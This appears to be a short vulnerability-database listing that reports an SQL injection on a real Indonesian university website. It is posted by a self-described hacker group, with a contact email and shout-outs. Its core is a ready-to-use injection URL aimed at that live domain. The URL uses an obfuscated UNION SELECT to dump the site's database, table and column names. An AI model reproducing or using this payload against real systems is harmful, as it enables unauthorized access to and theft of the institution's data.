UIN Alauddin Makassar Sql Injection Vulner - CXSecurity.com

Vulnerability ID 1865804 Vulnerability type
Published 2019-12-18 Updated 2019-12-18
CVE ID N/A CNNVD-ID N/A
Affected platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2019120079
|Vulnerability details
Vulnerability details have not yet been disclosed
|Vulnerability exploit
#Nick name : KHS1N Cyber 07
#Youtube     : HCT Sec07
#contact      : kuliahdopermanent@gmail.com

Vulnerability :
#SQL Injection

domain site && payload :
http://uin-alauddin.ac.id/agenda--227-rektor-menghadiri-pelantiknan-rektor-periode-20192023'+/*!50000UnIoN*/+/*!50000SeLeCt*/+1,/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/,3,4,5,6,7,8,9,10--+--.html

HCI Indonesia, bartes dwky, lammer permanent, and for all member